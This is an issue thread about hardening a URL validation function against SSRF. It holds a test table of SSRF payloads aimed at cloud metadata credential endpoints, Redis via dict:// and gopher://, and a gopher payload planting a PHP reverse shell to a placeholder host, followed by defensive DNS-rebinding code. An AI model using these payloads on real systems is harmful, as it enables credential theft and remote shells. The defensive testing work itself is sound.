validDns function rewrite #1

Open
opened 2023-03-10 21:30:14 +00:00 by mike · 7 comments
Owner

As stated, the validDns function needs a rewrite.
9cfa was assigned by mike 2023-03-10 21:30:14 +00:00
mike added this to the Project Ideas project 2023-03-10 21:30:15 +00:00
Collaborator
- Do not forget to use the same values for allowed ports/schemes as production, so as not to break something in the future.
Author
Owner

In a fair world, the preprod would mimic the prod env :D
Collaborator

71143ee238

small test result

Request	Payload	Status
32	https://example.com/?q=http://evil.com/redirect.php.	200
0		200
1	https://127.0.0.1/	422
2	https://localhost/	422
3	http://[::]:80/	422
4	http://[::]:25/	422
6	http://[::]:3128/	422
5	http://[::]:22/	422
7	http://0000::1:80/	422
9	http://0000::1:22/	422
8	http://0000::1:25/	422
11	http://127.127.127.127	422
13	http://127.0.0.0	422
15	http://3232235521/	422
10	http://0000::1:3128/	422
12	http://127.0.1.3	422
14	http://2130706433/	422
17	http://2852039166/	422
16	http://3232235777/	422
18	http://0177.0.0.1/	422
23	http://0/	422
24	http://127.1	422
26	http://127.0.0.1/%61dmin	422
27	http://127.0.0.1/%2561dmin	422
25	http://127.0.1	422
22	http://[0:0:0:0:0:ffff:127.0.0.1]	422
35	http://instance-data	422
29	http://127.1.1.1:80\@@127.2.2.2:80/	422
28	http://127.1.1.1:80\@127.2.2.2:80/	422
37	http://169.254.169.254.nip.io/	422
30	http://127.1.1.1:80:\@@127.2.2.2:80/	422
31	http://127.1.1.1:80#\@127.2.2.2:80/	422
36	http://169.254.169.254	422
38	http://425.510.425.510/	422
39	http://7147006462/	422
42	http://0x41414141A9FEA9FE/	422
40	http://0xA9.0xFE.0xA9.0xFE/	422
41	http://0xA9FEA9FE/	422
21	http://q177.0.0.1/	422
20	http://0o177.0.0.1/	422
19	http://o177.0.0.1/	422
33	https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=	422
43	http://0251.0376.0251.0376/	422
44	http://0251.00376.000251.0000376/	422
45	http://0251.254.169.254	422
34	https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg	422
46	http://169.254.169.254/latest/user-data	422
47	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE	422
48	http://169.254.169.254/latest/meta-data/	422
49	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE	422
50	http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance	422
51	http://169.254.169.254/latest/meta-data/ami-id	422
52	http://169.254.169.254/latest/meta-data/reservation-id	422
53	http://169.254.169.254/latest/meta-data/hostname	422
54	http://169.254.169.254/latest/meta-data/public-keys/	422
55	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key	422
56	http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key	422
63	http://metadata.google.internal/computeMetadata/v1/	422
57	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy	422
64	http://metadata/computeMetadata/v1/	422
58	http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access	422
65	http://metadata.google.internal/computeMetadata/v1/instance/hostname	422
59	http://169.254.169.254/latest/dynamic/instance-identity/document	422
66	http://metadata.google.internal/computeMetadata/v1/instance/id	422
60	http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role	422
67	http://metadata.google.internal/computeMetadata/v1/project/project-id	422
62	http://169.254.169.254/computeMetadata/v1/	422
68	http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true	422
61	http://localhost:9001/2018-06-01/runtime/invocation/next	422
69	http://metadata.google.internal/computeMetadata/v1beta1/	422
75	http://169.254.169.254/metadata/v1/user-data	422
72	http://169.254.169.254/metadata/v1.json	422
74	http://169.254.169.254/metadata/v1/id	422
73	http://169.254.169.254/metadata/v1/	422
76	http://169.254.169.254/metadata/v1/hostname	422
79	http://169.254.169.254/metadata/v1/maintenance	422
81	http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text	422
80	http://169.254.169.254/metadata/instance?api-version=2017-04-02	422
77	http://169.254.169.254/metadata/v1/region	422
78	http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address	422
83	http://169.254.169.254/2009-04-04/meta-data/	422
85	http://192.0.0.192/latest/user-data/	422
82	http://169.254.169.254/openstack	422
86	http://192.0.0.192/latest/meta-data/	422
84	http://192.0.0.192/latest/	422
87	http://192.0.0.192/latest/attributes/	422
88	http://100.100.100.200/latest/meta-data/	422
90	http://100.100.100.200/latest/meta-data/image-id	422
89	http://100.100.100.200/latest/meta-data/instance-id	422
91	http://127.0.0.1:2375/v1.24/containers/json	422
94	url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp	422
93	url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php	422
95	url=dict://127.0.0.1:6379/SAVE	422
96	gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml	422
92	url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html	422
103	https://metadata.packet.net	422
97	gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php	422
104	https://metadata.google.internal	422
100	http://1.1.1.1 &@2.2.2.2# @3.3.3.3/	422
99	gopher://127.0.0.1:6379/_save	422
98	gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22	422
101	https://192.0.0.192	422
70	http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true	422
102	https://169.254.169.254	422
106	http://[0:0:0:0:0:ffff:169.254.169.254]	422
105	http://[::ffff:169.254.169.254]	422
71	http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json	422
107	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy	422
111	http://169.254.169.254/latest/meta-data/ami-id	422
109	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]	422
110	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]	422
108	http://169.254.169.254/latest/user-data	422
118	http://metadata.google.internal/computeMetadata/v1/	422
112	http://169.254.169.254/latest/meta-data/reservation-id	422
119	http://metadata/computeMetadata/v1/	422
116	http://169.254.170.2/v2/credentials/	422
115	http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key	422
120	http://metadata.google.internal/computeMetadata/v1/instance/hostname	422
113	http://169.254.169.254/latest/meta-data/hostname	422
121	http://metadata.google.internal/computeMetadata/v1/instance/id	422
122	http://metadata.google.internal/computeMetadata/v1/project/project-id	422
114	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key	422
123	http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env	422
117	http://169.254.169.254/computeMetadata/v1/	422
124	http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true	422
125	http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json	422
133	https://metadata.packet.net/userdata	422
128	http://169.254.169.254/metadata/v1/id	422
131	http://169.254.169.254/metadata/v1/region	422
130	http://169.254.169.254/metadata/v1/hostname	422
127	http://169.254.169.254/metadata/v1/ 	422
126	http://169.254.169.254/metadata/v1.json	422
132	http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address	422
129	http://169.254.169.254/metadata/v1/user-data	422
137	http://100.100.100.200/latest/meta-data/	422
136	http://169.254.169.254/opc/v1/instance/	422
138	http://100.100.100.200/latest/meta-data/instance-id	422
135	http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text	422
145	https://kubernetes.default.svc.cluster.local	422
134	http://169.254.169.254/metadata/instance?api-version=2017-04-02	422
146	https://kubernetes.default	422
139	http://100.100.100.200/latest/meta-data/image-id	422
147	https://kubernetes.default.svc/metrics	422
141	http://192.0.0.192/latest/	422
143	http://192.0.0.192/latest/meta-data/	422
142	http://192.0.0.192/latest/user-data/	422
144	http://192.0.0.192/latest/attributes/	422
140	http://169.254.169.254/openstack	400
Collaborator

The moment this is rolled out into production, check all callback formats to see if they pass the new checks: character whitelisting and ports.
Collaborator

When deploying py requests in the call script, it should validate the domain again before calling, to protect from DNS rebinding. Also, requests needs to have following redirections disabled.
mike closed this issue 2023-03-14 18:00:58 +00:00
Collaborator

DNS rebinding protection needs to be implemented.
9cfa reopened this issue 2023-04-04 18:50:26 +00:00
Collaborator

Two consecutive calls to socket.getaddrinfo aren't guaranteed to return the same info, depending on the system configuration. If the "safe"-looking record's TTL expires between the verification lookup and the lookup for actually opening the socket, we may end up connecting to a very different server than the one we OK'd!

Advocate gets around this by only using one getaddrinfo call for both verification and connecting the socket. In pseudocode:

```python
import socket

def connect_socket(host, port):
    # One getaddrinfo call serves both the check and the connect, so no second lookup can race it
    for res in socket.getaddrinfo(host, port, type=socket.SOCK_STREAM):
        family, socktype, proto, _canon, sockaddr = res  # sockaddr[0] is the IP for the host
        if not is_blacklisted(sockaddr[0]):
            sock = socket.socket(family, socktype, proto)
            sock.connect(sockaddr)  # connect using the very address that was just vetted
            return sock
```

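Worked example (added here, not code from this issue or the fastapi project) of the policy the comments above ask for: a scheme and port allowlist, rejection of the userinfo (`@`) tricks from the test table, and a single getaddrinfo call whose answers are vetted and then handed straight to connect(), as Advocate does. ALLOWED_SCHEMES, ALLOWED_PORTS and BLOCKED_NETWORKS are assumed values to be aligned with production; unlike Advocate's skip-the-bad-record loop it refuses the host if any answer is blocked.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http": 80, "https": 443}  # assumed policy: scheme -> default port
ALLOWED_PORTS = {80, 443}                      # assumed; must mirror production's list

# Assumed blocklist on top of the ipaddress flags: RFC 1918/CGNAT space plus the
# 192.0.0.0/24, 100.64.0.0/10 and link-local ranges the metadata payloads above target.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.0.0.0/24", "192.168.0.0/16", "240.0.0.0/4", "fc00::/7", "fe80::/10",
)]

def is_blocked_address(ip_text: str) -> bool:
    """True if a resolved address must never be contacted."""
    ip = ipaddress.ip_address(ip_text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # unwrap ::ffff:169.254.169.254 so the IPv4 rules apply
    return (ip.is_loopback or ip.is_link_local or ip.is_unspecified or ip.is_multicast
            or any(ip in net for net in BLOCKED_NETWORKS))

def vetted_addresses(url: str) -> list:
    """Enforce scheme/port/userinfo policy, resolve ONCE, vet every answer, return the addrinfo."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname or parts.username is not None or parts.password is not None:
        raise ValueError("host missing or userinfo (@) present")
    port = parts.port or ALLOWED_SCHEMES[parts.scheme]
    if port not in ALLOWED_PORTS:
        raise ValueError(f"port not allowed: {port}")
    infos = socket.getaddrinfo(parts.hostname, port, type=socket.SOCK_STREAM)
    for *_, sockaddr in infos:  # any blocked answer fails the whole host: a mixed set is a rebinding smell
        if is_blocked_address(sockaddr[0]):
            raise ValueError(f"{parts.hostname} resolves to blocked address {sockaddr[0]}")
    return infos

def url_is_rejected(url: str) -> bool:
    """Self-check helper: does the policy refuse this URL before any connection is attempted?"""
    try:
        return not vetted_addresses(url)
    except ValueError:
        return True

def connect_vetted(url: str) -> socket.socket:
    """Connect with the vetted addrinfo, never by hostname (that would resolve a second time)."""
    for family, socktype, proto, _canon, sockaddr in vetted_addresses(url):
        sock = socket.socket(family, socktype, proto)
        try:
            sock.connect(sockaddr)
            return sock
        except OSError:
            sock.close()
    raise OSError(f"no vetted address for {url} accepted a connection")
```

The callback client must then send its request over the socket returned by connect_vetted (or an HTTP client that accepts a pre-connected socket) and must not follow redirects, since each redirect is a fresh URL that has to go through vetted_addresses again.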
Reference: mike/fastapi#1